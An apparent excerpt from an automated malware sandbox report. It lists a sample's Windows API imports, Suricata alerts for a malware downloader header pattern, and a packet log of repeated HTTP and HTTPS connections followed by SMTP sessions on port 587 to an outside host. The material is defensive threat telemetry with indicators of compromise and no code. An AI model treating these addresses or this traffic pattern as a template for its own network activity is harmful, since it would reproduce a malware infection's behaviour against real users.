IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T16:32:31.032775+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49699	193.122.6.168	80	TCP
2024-11-18T16:32:32.235873+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49699	193.122.6.168	80	TCP
2024-11-18T16:32:33.057056+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49701	188.114.97.3	443	TCP
2024-11-18T16:32:33.970273+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49702	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 16:32:29.773724079 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:29.778774977 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:29.778943062 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:29.779119968 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:29.784109116 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:30.677658081 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:30.707180023 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:30.726012945 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:30.978821039 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:31.032774925 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:31.033410072 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.033442974 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.033514977 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.040508032 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.040520906 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.698038101 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.698127985 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.703272104 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.703285933 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.703644037 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.751494884 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.754324913 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.795336962 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.924128056 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.924192905 CET	443	49700	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:31.924247980 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.932173967 CET	49700	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:31.934933901 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:31.940006018 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:32.182148933 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:32.184293985 CET	49701	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:32.184330940 CET	443	49701	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:32.184425116 CET	49701	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:32.184706926 CET	49701	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:32.184717894 CET	443	49701	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:32.235872984 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:32.828879118 CET	443	49701	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:32.831486940 CET	49701	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:32.831551075 CET	443	49701	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:33.057073116 CET	443	49701	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:33.057140112 CET	443	49701	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:33.057235003 CET	49701	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:33.057890892 CET	49701	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:33.061091900 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:33.062294006 CET	49702	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:33.067601919 CET	80	49699	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:33.067698002 CET	49699	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:33.068201065 CET	80	49702	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:33.068281889 CET	49702	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:33.068366051 CET	49702	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:33.074321032 CET	80	49702	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:33.916315079 CET	80	49702	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:33.917812109 CET	49704	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:33.917861938 CET	443	49704	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:33.917939901 CET	49704	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:33.918219090 CET	49704	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:33.918235064 CET	443	49704	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:33.970273018 CET	49702	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:34.578968048 CET	443	49704	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:34.580707073 CET	49704	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:34.580753088 CET	443	49704	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:34.741662025 CET	443	49704	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:34.741734028 CET	443	49704	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:34.741791010 CET	49704	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:34.742150068 CET	49704	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:34.747035980 CET	49705	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:34.752187014 CET	80	49705	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:34.752260923 CET	49705	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:34.752368927 CET	49705	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:34.884226084 CET	80	49705	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:35.590044022 CET	80	49705	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:35.591769934 CET	49706	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:35.591809988 CET	443	49706	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:35.591880083 CET	49706	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:35.592228889 CET	49706	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:35.592240095 CET	443	49706	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:35.642191887 CET	49705	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:36.238285065 CET	443	49706	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:36.240128040 CET	49706	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:36.240174055 CET	443	49706	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:36.401905060 CET	443	49706	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:36.401994944 CET	443	49706	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:36.402067900 CET	49706	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:36.402558088 CET	49706	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:36.405962944 CET	49705	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:36.407069921 CET	49712	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:36.411956072 CET	80	49712	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:36.412060022 CET	49712	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:36.412177086 CET	49712	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:36.412934065 CET	80	49705	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:36.412992001 CET	49705	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:36.417817116 CET	80	49712	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:37.257783890 CET	80	49712	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:37.259272099 CET	49718	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:37.259293079 CET	443	49718	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:37.259365082 CET	49718	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:37.259686947 CET	49718	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:37.259700060 CET	443	49718	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:37.298525095 CET	49712	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:37.920783997 CET	443	49718	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:37.922427893 CET	49718	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:37.922457933 CET	443	49718	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:38.079787016 CET	443	49718	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:38.079862118 CET	443	49718	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:38.079909086 CET	49718	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:38.080425024 CET	49718	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:38.084363937 CET	49712	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:38.085671902 CET	49724	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:38.091486931 CET	80	49712	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:38.091545105 CET	49712	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:38.092289925 CET	80	49724	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:38.092360973 CET	49724	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:38.092452049 CET	49724	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:38.099837065 CET	80	49724	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:40.191843033 CET	80	49724	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:40.193459988 CET	49735	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:40.193526983 CET	443	49735	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:40.193604946 CET	49735	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:40.193847895 CET	49735	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:40.193878889 CET	443	49735	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:40.235934019 CET	49724	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:40.814594984 CET	443	49735	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:40.816446066 CET	49735	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:40.816466093 CET	443	49735	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:40.964636087 CET	443	49735	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:40.964802027 CET	443	49735	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:40.964847088 CET	49735	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:40.965209007 CET	49735	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:40.968899012 CET	49724	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:40.969455957 CET	49741	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:40.974273920 CET	80	49724	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:40.974343061 CET	49724	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:40.974433899 CET	80	49741	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:40.974517107 CET	49741	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:40.974631071 CET	49741	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:40.979594946 CET	80	49741	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:41.838534117 CET	80	49741	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:41.839940071 CET	49747	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:41.839988947 CET	443	49747	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:41.840061903 CET	49747	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:41.840425968 CET	49747	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:41.840436935 CET	443	49747	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:41.892235994 CET	49741	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:42.490046978 CET	443	49747	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:42.492024899 CET	49747	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:42.492055893 CET	443	49747	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:43.007507086 CET	443	49747	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:43.007580996 CET	443	49747	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:43.007673979 CET	49747	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:43.008150101 CET	49747	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:43.011383057 CET	49741	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:43.012495995 CET	49756	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:43.016721010 CET	80	49741	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:43.016841888 CET	49741	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:43.017714977 CET	80	49756	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:43.017822027 CET	49756	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:43.017920971 CET	49756	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:43.023958921 CET	80	49756	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:43.879396915 CET	80	49756	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:43.881191015 CET	49762	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:43.881241083 CET	443	49762	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:43.881323099 CET	49762	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:43.881608963 CET	49762	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:43.881624937 CET	443	49762	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:43.923440933 CET	49756	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:44.537468910 CET	443	49762	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:44.539000034 CET	49762	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:44.539040089 CET	443	49762	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:44.701436996 CET	443	49762	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:44.701505899 CET	443	49762	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:44.701596975 CET	49762	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:44.702172041 CET	49762	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:44.721839905 CET	49756	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:44.723174095 CET	49769	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:44.729300022 CET	80	49756	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:44.729372025 CET	80	49769	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:44.729448080 CET	49756	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:44.729476929 CET	49769	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:44.729645967 CET	49769	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:44.735589981 CET	80	49769	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:45.579652071 CET	80	49769	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:45.581104994 CET	49775	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:45.581146002 CET	443	49775	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:45.581257105 CET	49775	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:45.581509113 CET	49775	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:45.581522942 CET	443	49775	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:45.626609087 CET	49769	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:46.229244947 CET	443	49775	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:46.247298956 CET	49775	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:46.247344971 CET	443	49775	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:46.546077967 CET	443	49775	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:46.546153069 CET	443	49775	188.114.97.3	192.168.2.7
Nov 18, 2024 16:32:46.546335936 CET	49775	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:46.546855927 CET	49775	443	192.168.2.7	188.114.97.3
Nov 18, 2024 16:32:46.600873947 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:46.600920916 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:46.601011038 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:46.603224039 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:46.603240013 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:46.624555111 CET	49769	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:46.630194902 CET	80	49769	193.122.6.168	192.168.2.7
Nov 18, 2024 16:32:46.631272078 CET	49769	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:47.462182999 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:47.462280989 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:47.469983101 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:47.470011950 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:47.470357895 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:47.473514080 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:47.519328117 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:47.729145050 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:47.729291916 CET	443	49780	149.154.167.220	192.168.2.7
Nov 18, 2024 16:32:47.729341984 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:47.733351946 CET	49780	443	192.168.2.7	149.154.167.220
Nov 18, 2024 16:32:52.925559044 CET	49702	80	192.168.2.7	193.122.6.168
Nov 18, 2024 16:32:53.287389040 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:53.292766094 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:53.292861938 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:55.750030994 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:55.750330925 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:55.757081032 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.081542969 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.081760883 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:56.086983919 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.426175117 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.426745892 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:56.432197094 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.771290064 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.771353960 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.771394968 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:56.771405935 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:56.814201117 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:56.833403111 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:56.838593006 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:57.154282093 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:57.157340050 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:57.162369967 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:57.477994919 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:57.484925032 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:57.489885092 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:57.827492952 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:57.827958107 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:57.833184958 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:58.162075043 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:58.166353941 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:58.171427965 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:58.487968922 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:58.488205910 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:58.494570017 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:58.829797983 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:58.831904888 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:58.837177038 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:59.173137903 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:59.173882008 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:59.173942089 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:59.173974991 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:59.178042889 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:32:59.179097891 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:59.179109097 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:59.179116011 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:59.183887005 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:59.566082001 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:32:59.611001968 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:01.082078934 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:01.087483883 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:01.452711105 CET	587	49813	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:01.453258991 CET	49813	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:01.454251051 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:01.460089922 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:01.460181952 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:03.483649969 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:03.484186888 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:03.489851952 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:03.805059910 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:03.805366993 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:03.811136007 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:04.127310991 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:04.127652884 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:04.136802912 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:04.471359015 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:04.471414089 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:04.471457005 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:04.471491098 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:04.472688913 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:04.477710962 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:05.072943926 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:05.073915005 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:05.078963041 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:05.429358959 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:05.429785967 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:05.435636997 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:05.752422094 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:05.752733946 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:05.759512901 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:06.075716019 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:06.076034069 CET	49850	587	192.168.2.7	217.144.107.148
